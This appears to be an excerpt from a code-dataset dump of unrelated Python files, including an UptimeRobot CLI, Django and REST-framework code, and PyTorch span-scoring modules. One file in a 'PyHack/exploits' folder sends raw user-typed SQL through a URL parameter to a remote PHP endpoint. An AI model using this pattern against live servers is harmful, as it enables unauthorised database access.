url\n\telse:\n\t\tprint(\"invalid monitor type\")\n\t\tsys.exit()\n\t\n\tFRIENDLY_NAME = url + \" \" + monitor_type\n\t\n\tpayload = \"&type=\"+MONITOR_TYPE\n\tif SUB_TYPE:\n\t\tpayload += \"&sub_type=\"+SUB_TYPE\n\tif PORT:\n\t\tpayload += \"&port=\"+PORT\n\tpayload += \"&url=\"+URL\n\tpayload += 
\"&friendly_name=\"+FRIENDLY_NAME\n\tpayload += \"&interval=\"+str(INTERVAL)\n\tpayload += \"&alert_contacts=\"+ALERT_CONTACT_ID\n\n\tprint(uptimeRequest(\"/v2/newMonitor\",payload))\n\ndef getAlertContacts():\n\tpayload = \"\"\n\n\tjson_results = uptimeRequest(\"/v2/getAlertContacts\",payload)\n\tfor alert_contact in json_results['alert_contacts']:\n\t\tprint(alert_contact['id'],alert_contact['friendly_name'])\n\nargs = sys.argv[1:]\n\nif len(args) == 0:\n\tlistMonitors()\n\nelif args[0] == \"monitors\":\n\tlistMonitors()\n\nelif args[0] == \"monitorid\":\n\tprint(listMonitorIdByName(args[1]))\n\nelif args[0] == \"contacts\":\n\tgetAlertContacts()\n\nelif args[0] == \"create\":\n\tif len(args) == 3:\n\t\taddMonitor(args[1], args[2])\n\telse:\n\t\tprint(\"invalid usage. \\n uptimerobot.py create \")\n\nelif args[0] == \"delete\":\n\tif len(args) == 2:\n\t\tdeleteMonitorById(args[1])\n\telse:\n\t\tprint(\"invalid usage. \\n uptimerobot.py delete \")\nelse:\n\tprint(\"invalid command. \\n\")\n\tprint(\"uptimerobot-cli monitors\")\n\tprint(\"uptimerobot-cli monitorid \")\n\tprint(\"uptimerobot-cli contacts\")\n\tprint(\"uptimerobot-cli create \")\n\tprint(\"uptimerobot-cli delete \")","sub_path":"uptimerobot.py","file_name":"uptimerobot.py","file_ext":"py","file_size_in_byte":4624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"107434001","text":"\n\nfrom xai.brain.wordbase.nouns._paste import _PASTE\n\n#calss header\nclass _PASTES(_PASTE, ):\n\tdef __init__(self,): \n\t\t_PASTE.__init__(self)\n\t\tself.name = \"PASTES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"paste\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_pastes.py","file_name":"_pastes.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"533837239","text":"import numpy as np\nfrom multiprocessing import Queue, Value, Process\n\nfrom server.analysis.compressor._run import _run\n\n\nclass Compressor:\n def __init__(self):\n self._is_running = Value(\"i\", False)\n self._input_image_queue = Queue()\n self._output_image_queue = Queue()\n self._process = None\n\n def start(self):\n self._process = Process(\n target=_run,\n args=(self._input_image_queue, self._output_image_queue, self._is_running)\n )\n self._is_running.value = True\n self._process.start()\n\n def stop(self):\n if self._process is None:\n raise AttributeError(\"Compressor did not start yet, cannot stop\")\n\n self._is_running.value = False\n self._input_image_queue.put(np.empty((1, 1, 3), dtype=np.uint8))\n self._process.join()\n\n @property\n def input_queue(self) -> Queue:\n return self._input_image_queue\n\n @property\n def output_queue(self) -> Queue:\n return self._output_image_queue\n","sub_path":"server/analysis/compressor/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"243267383","text":"\"\"\"project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. 
Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nimport app01.views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',app01.views.index, name='index'),\n path('word',app01.views.word, name='word'),\n path('blog',app01.views.blog, name='blog'),\n path('new',app01.views.new, name='new'),\n path('create', app01.views.create, name='create'),\n path('detail/', app01.views.detail, name='detail'),\n path('delete/', app01.views.delete, name='delete'),\n path('update/', app01.views.update, name=\"update\"),\n path('ud/', app01.views.ud, name=\"ud\")\n]\n","sub_path":"Django/project/project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"155542906","text":"import urllib.request\n\ndef db():\n base_url = \"http://white-db.000webhostapp.com/db-read.php\"\n a = \"?val=\"\n b = input('Enter an SQL query: ').replace(' ', '+')\n\n URL = base_url + a + b\n print('\\n')\n\n contents = str(urllib.request.urlopen(URL).read()).replace('
    ', '\\n')[2:-1]\n print(contents)\n","sub_path":"PyHack/exploits/dbread.py","file_name":"dbread.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"4284597","text":"from django.core.management.base import BaseCommand, CommandError\n\nfrom app import models\n\n_twitteruser_username = \"10sr\"\n_twitteruser_id_str = \"73722749\"\n\n\nclass Command(BaseCommand):\n help = \"Count sleep record num\"\n\n def add_arguments(self, parser):\n return\n\n def handle(self, *args, **kargs):\n try:\n user = models.TwitterUser.objects.get(username=_twitteruser_username)\n self.stdout.write(\"TwitterUser `{}' already exists\".format(user))\n except models.TwitterUser.DoesNotExist as e:\n self.stdout.write(\n \"TwitterUser {} not exists, creating\".format(_twitteruser_username)\n )\n models.TwitterUser(\n username=_twitteruser_username, id_str=_twitteruser_id_str\n ).save()\n # return\n","sub_path":"app/management/commands/local_addrecords.py","file_name":"local_addrecords.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"606065995","text":"###############################################################################################################################\n# 3 模型序列化器\n# 1. 可以帮我们自动完成字段的声明[主要是从模型中的字段声明里面提取过来]\n# 2. 模型序列化器也可以帮我们声明了create和update方法的代码\n###############################################################################################################################\nfrom rest_framework import serializers\nfrom booktest.models import BookInfo\nclass BookInfoModelSerializer(serializers.ModelSerializer):\n # 模型序列化器也可以自定义验证字段[当某些数据不存在于数据库时,但是需要前端提交过来的,可以进行自定义,\n # 例如,验证码,确认密码]\n\n class Meta:\n model=BookInfo\n fields = \"__all__\"\n # 可以给模型序列化器里面指定的字段设置限制选项\n extra_kwargs = {\n \"bread\":{\"min_value\":0,\"required\":True},\n }\n\n # 自定义验证方法[验证单个字段,可以有多个方法]\n # def validate_<字段名>(self,data): # data当前字段对应的值\n def validate_btitle(self,data):\n print(\"----获取视图类中传递过来的数据---\")\n print(self.context.get(\"view\"))\n # 可以通过视图类附带一些数据到序列化器里面直接使用 view.py的69行代码\n # print(self.context.get(\"view\").user)\n print(\"----获取视图类中传递过来的数据---\")\n # 例如,图书名不能是红楼梦\n if data==\"红楼梦\":\n # 抛出错误\n raise serializers.ValidationError(\"红楼梦是禁书~\")\n # 验证方法中,把数据值必须返回给字段,否则字段值为空\n return data\n\n # 自定义验证方法[验证多个或者所有字段,只能出现一次]\n def validate(self,data): # data 这个是所有字段的内容,字典类型\n bread = data.get(\"bread\")\n bcomment = data.get(\"bcomment\")\n if bread>=bcomment:\n return data\n raise serializers.ValidationError(\"阅读量小于评论量,数据太假了\")","sub_path":"viewdemo/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"309222404","text":"\r\nimport logging\r\nfrom collections import OrderedDict\r\nimport torch\r\nimport torch.nn as nn\r\n\r\nfrom torch.nn.modules.activation import Sigmoid, ReLU\r\n\r\nfrom allennlp.modules.conditional_random_field import ConditionalRandomField\r\nfrom allennlp.modules import FeedForward\r\nfrom allennlp.modules.span_extractors import SelfAttentiveSpanExtractor\r\nfrom allennlp.modules.span_extractors import EndpointSpanExtractor\r\nfrom allennlp.modules import TimeDistributed, Pruner\r\nfrom allennlp.nn import util\r\n\r\n\r\nfrom pytorch_models.utils import one_hot, get_activation_fn\r\nfrom pytorch_models.utils import map_dict_builder\r\nfrom pytorch_models.utils import 
create_mask, map_dict_builder\r\nfrom pytorch_models.training import get_entity_loss\r\n\r\nclass SpanEmbedder(nn.Module):\r\n '''\r\n Create span embeddings\r\n \r\n \r\n Parameters\r\n ----------\r\n num_tags: label vocab size\r\n \r\n Returns\r\n -------\r\n arg_scores: tensor of scores (batch_size, trig_num, arg_num, 2)\r\n \r\n '''\r\n def __init__(self, input_dim, \\\r\n use_endpoint = True, \r\n use_attention = True,\r\n combination = \"x,y\",\r\n num_width_embeddings = None,\r\n span_width_embedding_dim = None,\r\n span_end_is_exclusive = True):\r\n \r\n super(SpanEmbedder, self).__init__()\r\n \r\n self.input_dim = int(input_dim)\r\n self.use_endpoint = bool(use_endpoint)\r\n self.use_attention = bool(use_attention)\r\n self.combination = str(combination)\r\n \r\n if span_width_embedding_dim is None:\r\n self.num_width_embeddings = None\r\n feat_size = 0\r\n else:\r\n self.num_width_embeddings = num_width_embeddings\r\n feat_size = span_width_embedding_dim\r\n \r\n self.span_width_embedding_dim = span_width_embedding_dim\r\n self.span_end_is_exclusive = bool(span_end_is_exclusive)\r\n\r\n # Endpoint extractor\r\n if self.use_endpoint:\r\n self._endpoint_extractor = EndpointSpanExtractor( \\\r\n input_dim = self.input_dim,\r\n combination = self.combination,\r\n num_width_embeddings = self.num_width_embeddings,\r\n span_width_embedding_dim = self.span_width_embedding_dim,\r\n bucket_widths = False)\r\n \r\n # Self-attentive span extractor\r\n if self.use_attention:\r\n self._attentive_extractor = \\\r\n SelfAttentiveSpanExtractor(input_dim=self.input_dim)\r\n\r\n # Dimensionality of span/Input dimension for FFNN\r\n a = len(self.combination.split(','))*int(self.use_endpoint)\r\n b = int(self.use_attention)\r\n self.output_dim = self.input_dim*(a + b) + feat_size\r\n\r\n # Placeholder for decrement in span end index\r\n self.span_offset = None\r\n\r\n\r\n def forward(self, sequence_tensor, sequence_mask, \r\n span_indices, span_mask):\r\n '''\r\n Parameters\r\n ----------\r\n sequence_tensor: sequence representation (batch_size, seq_len, embed_dim)\r\n sequence_mask: sequence mask (batch_size, seq_len)\r\n span_indices: tensor of span indices (batch_size, span_num, 2)\r\n span_mask: tensor of mask (batch_size, trig_num)\r\n \r\n Returns\r\n ------- \r\n span_embed: tensor of span embeddings (batch_size, span_num, output_dim) \r\n '''\r\n \r\n # If span end indices are exclusive, subtract 1\r\n if self.span_end_is_exclusive:\r\n \r\n # Initialize span offset (decrement end indices)\r\n if (self.span_offset is None) or \\\r\n (self.span_offset.shape != span_indices.shape):\r\n \r\n self.span_offset = torch.zeros_like(span_indices, \\\r\n requires_grad=False) \r\n self.span_offset[:,:,1] = - 1\r\n \r\n # Apply offset\r\n span_indices = span_indices + self.span_offset\r\n\r\n # Initialize output\r\n span_embed = []\r\n \r\n # Endpoint embedding\r\n if self.use_endpoint:\r\n span_embed.append(self._endpoint_extractor( \\\r\n sequence_tensor = sequence_tensor,\r\n span_indices = span_indices,\r\n sequence_mask = sequence_mask,\r\n span_indices_mask = span_mask))\r\n \r\n # Attentive embedding\r\n if self.use_attention:\r\n span_embed.append(self._attentive_extractor( \\\r\n sequence_tensor = sequence_tensor,\r\n span_indices = span_indices,\r\n sequence_mask = sequence_mask,\r\n span_indices_mask = span_mask))\r\n \r\n return torch.cat(span_embed, dim=2)\r\n\r\n\r\ndef span_labels_to_scores(labels, mask, num_tags, low_val, high_val, pruner):\r\n '''\r\n Use gold labels or CRF-predicted 
labels to generate label scores\r\n '''\r\n \r\n # Create binary, indicator labels\r\n binary_labels = (labels > 0).type(torch.FloatTensor)\r\n binary_labels = binary_labels.to(labels.device)\r\n\r\n # Number of elements to keep\r\n num_items_to_keep = max(int(binary_labels.sum(1).max()), 1)\r\n\r\n # Add dimension to binary labels so it can be treated as an embedding\r\n embeddings = binary_labels.unsqueeze(-1)\r\n\r\n # Get spans with positive labels\r\n _, mask_top, indices_top, prune_scores_top = \\\r\n pruner(embeddings, mask, num_items_to_keep)\r\n prune_scores_top = prune_scores_top.squeeze(-1) \r\n \r\n # Span scores\r\n label_scores = one_hot(labels, num_tags, \\\r\n low_val = low_val, \r\n high_val = high_val)\r\n\r\n # Top span scores\r\n label_scores_top = util.batched_index_select( \\\r\n target = label_scores, \r\n indices = indices_top)\r\n\r\n return (mask_top, indices_top, prune_scores_top, label_scores_top)\r\n\r\n\r\nclass PassThrough(nn.Module):\r\n '''\r\n Simple pass-through \r\n '''\r\n def __init__(self):\r\n super(PassThrough, self).__init__()\r\n \r\n def forward(self, x):\r\n return x\r\n \r\nclass SpanScorerGold(nn.Module):\r\n '''\r\n Span scorer using gold labels\r\n Convert labels to one hot encoding\r\n \r\n \r\n Parameters\r\n ----------\r\n num_tags: label vocab size\r\n \r\n \r\n Returns\r\n -------\r\n arg_scores: tensor of scores (batch_size, trig_num, arg_num, num_tags)\r\n \r\n '''\r\n def __init__(self, num_tags, low_val=-5, high_val=5):\r\n super(SpanScorerGold, self).__init__()\r\n \r\n self.num_tags = num_tags\r\n self.low_val = low_val\r\n self.high_val = high_val\r\n\r\n scorer = TimeDistributed(PassThrough())\r\n self._pruner = Pruner(scorer)\r\n\r\n\r\n def forward(self, labels, mask, embed):\r\n '''\r\n Parameters\r\n ----------\r\n span_labels: tensor of labels (batch_size, num_spans)\r\n \r\n Returns\r\n -------\r\n Pulled from AllenNLP GitHub:\r\n https://github.com/allenai/allennlp/blob/master/allennlp/modules/pruner.py\r\n \r\n embed_top : ``torch.FloatTensor``\r\n The representations of the top-k scoring items.\r\n Has shape (batch_size, num_items_to_keep, embedding_size).\r\n mask_top : ``torch.LongTensor``\r\n The corresponding mask for ``embed_top``.\r\n Has shape (batch_size, num_items_to_keep).\r\n indices_top : ``torch.IntTensor``\r\n The indices of the top-k scoring items into the original ``embeddings``\r\n tensor. This is returned because it can be useful to retain pointers to\r\n the original items, if each item is being scored by multiple distinct\r\n scorers, for instance. 
Has shape (batch_size, num_items_to_keep).\r\n top_item_scores : ``torch.FloatTensor``\r\n The values of the top-k scoring items.\r\n Has shape (batch_size, num_items_to_keep, 1).\r\n '''\r\n\r\n # Get scores from labels\r\n mask_top, indices_top, prune_scores_top, label_scores_top, \\\r\n = span_labels_to_scores( \\\r\n labels = labels, \r\n mask = mask, \r\n num_tags = self.num_tags, \r\n low_val = self.low_val, \r\n high_val = self.high_val,\r\n pruner = self._pruner)\r\n\r\n # Get top embeddings\r\n embed_top = util.batched_index_select(embed, indices_top)\r\n\r\n \r\n return (indices_top, embed_top, mask_top, prune_scores_top, label_scores_top)\r\n\r\n\r\nclass SpanScorerCRF(nn.Module):\r\n '''\r\n Span extractor\r\n '''\r\n def __init__(self, embed_size, label_map,\r\n low_val = -5, \r\n high_val = 5, \r\n constraints = None,\r\n incl_start_end = True,\r\n ):\r\n super(SpanScorerCRF, self).__init__()\r\n\r\n self.embed_size = embed_size\r\n self.label_map = label_map\r\n self.low_val = low_val\r\n self.high_val = high_val \r\n self.constraints = constraints\r\n self.incl_start_end = incl_start_end\r\n \r\n # Number of positive tags\r\n self.num_pos_tags = len(label_map[1:])\r\n \r\n # label_map to/from BIO (0th label is negative)\r\n self.mapping_BIO = label_map[:] + label_map[1:]\r\n \r\n # Dicts for mapping to/from label indices\r\n self.label_to_id, self.id_to_label = \\\r\n map_dict_builder(self.mapping_BIO)\r\n \r\n # Number of tags, including BI prefixes \r\n self.num_tags = len(self.mapping_BIO)\r\n \r\n # Linear projection layer\r\n self.projection = nn.Linear(embed_size, self.num_tags)\r\n \r\n # Create event-specific CRF\r\n self.crf = ConditionalRandomField( \\\r\n num_tags = self.num_tags, \r\n constraints = constraints,\r\n include_start_end_transitions = incl_start_end) \r\n\r\n # Dummy pruner\r\n scorer = TimeDistributed(PassThrough())\r\n self._pruner = Pruner(scorer)\r\n\r\n def forward(self, seq_tensor, seq_mask, span_map, span_mask, embed, spans, \\\r\n span_labels=None):\r\n '''\r\n Generate predictions\r\n '''\r\n # Dimensionality\r\n batch_size, max_seq_len, input_dim = tuple(seq_tensor.shape)\r\n\r\n # Project input tensor sequence to logits\r\n logits = self.projection(seq_tensor)\r\n \r\n # Best path\r\n best_paths = self.crf.viterbi_tags( \\\r\n logits = logits, \r\n mask = seq_mask)\r\n \r\n # Separate predictions and score\r\n seq_pred, score = zip(*best_paths)\r\n seq_pred = list(seq_pred)\r\n\r\n '''\r\n Process predictions\r\n '''\r\n # Get spans from sequence tags\r\n # Converts list of list of predicted label indices to\r\n # tensor of size (batch_size, num_spans)\r\n span_pred = self._seq_tags_to_spans(seq_pred, span_map)\r\n\r\n # Get scores from labels\r\n mask_top, indices_top, prune_scores_top, label_scores_top, \\\r\n = span_labels_to_scores( \\\r\n labels = span_pred, \r\n mask = span_mask, \r\n num_tags = self.num_tags, \r\n low_val = self.low_val, \r\n high_val = self.high_val,\r\n pruner = self._pruner)\r\n\r\n # Get top embeddings\r\n embed_top = util.batched_index_select(embed, indices_top)\r\n \r\n '''\r\n Calculate loss\r\n '''\r\n # No labels provided\r\n if span_labels is None:\r\n loss = None\r\n \r\n # Span labels provided (i.e. 
training)\r\n else: \r\n # Convert span representation to sequence tags \r\n seq_true = self._spans_to_seq_tags(span_labels, spans, \r\n max_seq_len)\r\n # Get loss (negative log likely)\r\n loss = -self.crf( \\\r\n inputs = logits, \r\n tags = seq_true, \r\n mask = seq_mask)\r\n\r\n \r\n \r\n return (embed_top, mask_top, indices_top, prune_scores_top, \r\n label_scores_top, loss)\r\n\r\n def _to_BIO(self, span_label, start, end):\r\n '''\r\n Convert span representation to BIO representation\r\n \r\n Parameters\r\n ----------\r\n span_label: scaler tensor, span label index\r\n start: scaler tensor, span start index\r\n end: scaler tensor, span end index\r\n \r\n '''\r\n \r\n # Span length\r\n n = end - start\r\n\r\n # Inside label \r\n I = span_label + self.num_pos_tags\r\n \r\n # Initialize to inside label\r\n seq_labels = torch.zeros(n).type(torch.LongTensor) \r\n seq_labels.fill_(I)\r\n \r\n # Begin label\r\n seq_labels[0] = span_label\r\n\r\n #REMOVE\r\n #seq_labels.fill_(span_label)\r\n\r\n return seq_labels \r\n\r\n def _from_BIO(self, seq_label):\r\n '''\r\n Convert BIO representation to span representation\r\n \r\n Parameters\r\n ----------\r\n seq_label: int, span label with BIO indices\r\n '''\r\n \r\n \r\n \r\n logging.warn(\"=\"*300)\r\n logging.warn(\"TODO replace this fucntion with pytorch_models.crf.tag_to_span_lab \")\r\n logging.warn(\"=\"*300)\r\n \r\n \r\n \r\n is_outside = 0\r\n is_begin = 0\r\n is_inside = 0\r\n \r\n # Convert sequence label to span label (i.e. convert BI)\r\n if seq_label > self.num_pos_tags:\r\n span_label = seq_label - self.num_pos_tags\r\n is_inside = 1\r\n elif seq_label > 0:\r\n span_label = seq_label\r\n is_begin = 1\r\n else:\r\n span_label = seq_label\r\n is_outside = 1\r\n \r\n return (span_label, is_outside, is_begin, is_inside)\r\n\r\n\r\n\r\n def _seq_tags_to_spans(self, seq_tags, span_map):\r\n '''\r\n Convert sequence tags to span labels\r\n \r\n Parameters\r\n ----------\r\n seq_tags: list of list of label indices\r\n i.e. 
list of sentences, where each sentence \r\n is a list of label indices\r\n \r\n Returns\r\n -------\r\n span_labels: tensor of shape (batch_size, num_spans)\r\n \r\n '''\r\n\r\n # Get inputs for tensor initialization\r\n batch_size = len(seq_tags)\r\n num_spans = len(span_map)\r\n\r\n # Initialize span labels to null label\r\n span_labels = torch.zeros(batch_size, num_spans).type( \\\r\n torch.LongTensor)\r\n \r\n # Loop on sequences\r\n for i_seq, seq in enumerate(seq_tags):\r\n \r\n # Loop on spans\r\n for lab, start, end in self._BIO_to_span(seq):\r\n \r\n # Token indices of current span\r\n idx = (start, end)\r\n \r\n # Span in map\r\n if idx in span_map:\r\n\r\n # Span index within tensor\r\n i_span = span_map[idx]\r\n \r\n # Update label tensor\r\n span_labels[i_seq, i_span] = lab\r\n \r\n # Span not in map\r\n else:\r\n pass\r\n logging.warn(\"span not in map:\\t{}\".format(idx))\r\n\r\n \r\n return span_labels\r\n\r\n\r\n def _spans_to_seq_tags(self, labels, spans, max_seq_len):\r\n '''\r\n Convert span labels to sequence labels\r\n \r\n \r\n Parameters\r\n ----------\r\n labels: tensor of label indices (batch_size, num_spans)\r\n spans: tensor of span indices (batch_size, num_spans, 2)\r\n max_seq_len: int, maximum sequence length\r\n num_pos_tags: int, number of non-negative labels\r\n \r\n Returns\r\n -------\r\n seq_tags: tensor with BIO label indices (batch_size, max_seq_len)\r\n '''\r\n \r\n \r\n # Label dimensionality\r\n batch_size, num_spans = tuple(labels.shape)\r\n \r\n # Initialize sequence tags to 0\r\n # (batch_size, max_seq_len)\r\n seq_tags = torch.zeros(batch_size, max_seq_len).type( \\\r\n torch.LongTensor)\r\n\r\n # Find indices of all nonnegative (0) labels\r\n # (n, d) \r\n # n = number of nonzero elements, \r\n # d = number of dimensions in labels (i.e. 2)\r\n non_neg_indices = torch.nonzero(labels)\r\n \r\n # Iterate over nonnegative labels\r\n for indices in non_neg_indices:\r\n\r\n # Sequence and span indices \r\n # indices_shape (2)\r\n i_seq = indices[0]\r\n i_span = indices[1]\r\n\r\n # Label \r\n # (1)\r\n lab = labels[i_seq, i_span]\r\n \r\n # Span start and stop indices\r\n # (2)\r\n span = spans[i_seq, i_span]\r\n start = span[0]\r\n end = span[1]\r\n\r\n # Update sequence tags with BI labels\r\n seq_tags[i_seq, start:end] = self._to_BIO(lab, start, end)\r\n \r\n return seq_tags\r\n\r\n\r\n def _BIO_to_span(self, seq):\r\n '''\r\n \r\n Finds spans in BIO sequence\r\n \r\n NOTE: start span index is inclusive, end span index is exclusive\r\n e.g. 
like Python lists\r\n \r\n '''\r\n\r\n\r\n \r\n logging.warn(\"=\"*300)\r\n logging.warn(\"TODO replace this fucntion with pytorch_models.crf.BIO_to_span\")\r\n logging.warn(\"=\"*300) \r\n\r\n spans = []\r\n begin_count = 0\r\n start = -1\r\n end = -1\r\n active_tag = None\r\n \r\n if not any(seq):\r\n return []\r\n\r\n for i_tok, x in enumerate(seq):\r\n \r\n \r\n # Convert current sequence tag label to span label\r\n tag, is_outside, is_begin, is_inside = self._from_BIO(x)\r\n \r\n # Outside label\r\n if is_outside:\r\n \r\n # The span has ended\r\n if active_tag is not None:\r\n spans.append((active_tag, start, end))\r\n\r\n # Not in a span\r\n active_tag = None\r\n \r\n # Span beginning\r\n elif is_begin:\r\n \r\n # The span has ended\r\n if active_tag is not None:\r\n spans.append((active_tag, start, end))\r\n\r\n # Update active tag\r\n active_tag = tag\r\n \r\n # Index of current span start\r\n start = i_tok\r\n end = i_tok + 1\r\n \r\n # Increment begin count\r\n begin_count += 1\r\n \r\n # Span inside and current tag matches active tag\r\n # e.g. well-formed span\r\n elif is_inside and (tag == active_tag):\r\n end += 1\r\n \r\n # Ill formed span\r\n elif is_inside and (tag != active_tag):\r\n\r\n # Capture end of valid span\r\n if active_tag is not None:\r\n spans.append((active_tag, start, end))\r\n\r\n # Not in a span\r\n active_tag = None\r\n \r\n else:\r\n raise ValueError(\"could not assign label\")\r\n \r\n # Last token might be part of a valid span\r\n if active_tag is not None:\r\n spans.append((active_tag, start, end))\r\n\r\n # Get span count \r\n span_count = len(spans)\r\n \r\n if True and (begin_count != span_count):\r\n msg = \\\r\n '''Count mismatch:\r\n seq = {}\r\n Begin count = {}\r\n span count = {}'''.format(seq, begin_count, span_count)\r\n logging.warn(msg)\r\n\r\n return spans\r\n\r\nclass BeamScorer(nn.Module):\r\n '''\r\n \r\n '''\r\n def __init__(self, scorer, agg_type):\r\n super(BeamScorer, self).__init__()\r\n self._scorer = scorer \r\n self.agg_type = agg_type\r\n\r\n def forward(self, candidates):\r\n \r\n # Apply scorer\r\n # [batch_size, n_spans, n_labels]\r\n scores = self._scorer(candidates)\r\n \r\n # Get overall score for non-null (positive) labels\r\n # Null labels represented by label index 0\r\n if self.agg_type == 'max':\r\n pos_scores, _ = scores[:,:,1:].max(dim=-1)\r\n elif self.agg_type == 'sum':\r\n pos_scores = scores[:,:,1:].sum(dim=-1)\r\n else:\r\n raise ValueError(\"incorrect agg_type: {}\".format(self.agg_type))\r\n \r\n # Add last dimension for compliance with Pruner API\r\n # [batch_size, n_spans, 1]\r\n return pos_scores.unsqueeze(-1)\r\n\r\nclass SpanScorerPrune(nn.Module):\r\n '''\r\n Span scorer \r\n \r\n \r\n Parameters\r\n ----------\r\n num_tags: label vocab size\r\n \r\n \r\n Returns\r\n -------\r\n arg_scores: tensor of scores (batch_size, trig_num, arg_num, num_tags)\r\n \r\n '''\r\n def __init__(self, input_dim, hidden_dim, num_tags, \\\r\n activation = 'relu',\r\n dropout = 0.0,\r\n spans_per_word = 2,\r\n agg_type = 'max',\r\n loss_reduction = 'sum'):\r\n super(SpanScorerPrune, self).__init__()\r\n \r\n\r\n self.input_dim = input_dim\r\n self.hidden_dim = hidden_dim\r\n self.num_tags = num_tags\r\n \r\n self.activation = activation\r\n self.activation_fn = get_activation_fn(activation)\r\n\r\n self.dropout = dropout\r\n self.spans_per_word = spans_per_word\r\n self.agg_type = agg_type\r\n self.loss_reduction = loss_reduction\r\n \r\n \r\n self.num_layers = 1\r\n self.neg = -1e20\r\n \r\n '''\r\n Create 
classifier\r\n '''\r\n # Feedforward neural network for predicting span labels\r\n self._label_ffnn = FeedForward( \\\r\n input_dim = self.input_dim,\r\n num_layers = self.num_layers,\r\n hidden_dims = self.hidden_dim, \r\n activations = self.activation_fn,\r\n dropout = self.dropout)\r\n\r\n # Span classifier\r\n self._label_scorer = torch.nn.Sequential(\r\n TimeDistributed(self._label_ffnn),\r\n TimeDistributed(torch.nn.Linear(self.hidden_dim, self.num_tags)))\r\n\r\n '''\r\n Create pruner\r\n '''\r\n # Feedforward neural network for pruning score\r\n #self._pruning_ffnn = FeedForward( \\\r\n # input_dim = self.input_dim,\r\n # num_layers = self.num_layers,\r\n # hidden_dims = self.hidden_dim, \r\n # activations = self.activation,\r\n # dropout = self.dropout)\r\n\r\n # Pruning scoring function\r\n #self._pruning_scorer = torch.nn.Sequential(\r\n # TimeDistributed(self._pruning_ffnn),\r\n # TimeDistributed(torch.nn.Linear(self.hidden_dim, 1)))\r\n \r\n # Pruner\r\n self._pruning_scorer = BeamScorer(self._label_scorer, self.agg_type)\r\n self._pruner = Pruner(self._pruning_scorer) \r\n\r\n\r\n\r\n\r\n def forward(self, embed, mask, seq_lengths, span_labels=None):\r\n '''\r\n Parameters\r\n ----------\r\n span_labels: tensor of labels (batch_size, num_spans)\r\n \r\n Returns\r\n -------\r\n Pulled from AllenNLP GitHub:\r\n https://github.com/allenai/allennlp/blob/master/allennlp/modules/pruner.py\r\n \r\n embed_top : ``torch.FloatTensor``\r\n The representations of the top-k scoring items.\r\n Has shape (batch_size, num_items_to_keep, embedding_size).\r\n mask_top : ``torch.LongTensor``\r\n The corresponding mask for ``embed_top``.\r\n Has shape (batch_size, num_items_to_keep).\r\n indices_top : ``torch.IntTensor``\r\n The indices of the top-k scoring items into the original ``embeddings``\r\n tensor. This is returned because it can be useful to retain pointers to\r\n the original items, if each item is being scored by multiple distinct\r\n scorers, for instance. 
Has shape (batch_size, num_items_to_keep).\r\n top_item_scores : ``torch.FloatTensor``\r\n The values of the top-k scoring items.\r\n Has shape (batch_size, num_items_to_keep, 1).\r\n '''\r\n \r\n \r\n \r\n # Number of spans to keep by sentence\r\n # (batch_size)\r\n num_to_keep = seq_lengths*self.spans_per_word\r\n num_to_keep = torch.max(num_to_keep, torch.ones_like(num_to_keep))\r\n \r\n # Apply pruner to embeddings\r\n # embed_top (batch_size, max_num_to_keep, embed_dim)\r\n # mask_top, indices_top, prune_scores_top (batch_size, max_num_to_keep)\r\n # prune_scores_top (batch_size, max_num_to_keep, 1)\r\n embed_top, mask_top, indices_top, prune_scores_top = \\\r\n self._pruner(embed, mask, num_to_keep) \r\n prune_scores_top = prune_scores_top.squeeze(-1) \r\n\r\n # Compute label scores\r\n # (batch_size, num_spans, num_tags)\r\n label_scores = self._label_scorer(embed)\r\n\r\n # Give large negative scores to the masked-out values.\r\n label_scores = util.replace_masked_values( \\\r\n tensor = label_scores, \r\n mask = mask.unsqueeze(-1), \r\n replace_with = self.neg)\r\n\r\n # Top span scores\r\n label_scores_top = \\\r\n util.batched_index_select(label_scores, indices_top)\r\n\r\n if span_labels is None:\r\n loss = None\r\n else:\r\n loss = get_entity_loss( \\\r\n scores = label_scores, \r\n labels = span_labels, \r\n mask = mask,\r\n reduction = self.loss_reduction)\r\n\r\n \r\n return (embed_top, mask_top, indices_top, prune_scores_top, \r\n label_scores_top, loss)\r\n\r\n \r\n ","sub_path":"code/pytorch_models/span_scoring.py","file_name":"span_scoring.py","file_ext":"py","file_size_in_byte":27319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"423817124","text":"#\n# @lc app=leetcode id=242 lang=python3\n#\n# [242] Valid Anagram\n\n# Given two strings s and t , write a function to determine if t is an anagram of s.\n\n# Example 1:\n\n# Input: s = \"anagram\", t = \"nagaram\"\n# Output: true\n# Example 2:\n\n# Input: s = \"rat\", t = \"car\"\n# Output: false\n# Note:\n# You may assume the string contains only lowercase alphabets.\n\n# Follow up:\n# What if the inputs contain unicode characters? How would you adapt your solution to such case?\n\n\n# @lc 